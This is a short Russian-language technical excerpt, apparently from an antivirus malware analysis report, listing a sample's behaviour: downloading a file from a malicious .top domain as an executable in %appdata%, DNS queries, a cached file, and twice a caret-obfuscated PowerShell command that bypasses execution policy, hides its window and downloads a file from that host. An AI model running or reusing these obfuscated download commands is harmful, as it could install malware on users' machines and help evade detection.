Техническая информация
- http://dosehoop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^O^W^E^rS^h^eLl.eXe ^-e^XEc^u^TiO^npOLICY^ byPa^Ss^ ^-^nop^rof^i^LE -WI^N^dOwstYlE h^idDEn (NEW-^O^Bj^ecT systeM.^nEt.w^eBCL^IenT)^.^dO^Wnl^o^a^dFile('http://dosehoop.top/read...
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- DNS ASK do###oop.top
- '<SYSTEM32>\cmd.exe' /c "p^O^W^E^rS^h^eLl.eXe ^-e^XEc^u^TiO^npOLICY^ byPa^Ss^ ^-^nop^rof^i^LE -WI^N^dOwstYlE h^idDEn (NEW-^O^Bj^ecT systeM.^nEt.w^eBCL^IenT)^.^dO^Wnl^o^a^dFile('http://dosehoop.top/read... (со скрытым окном)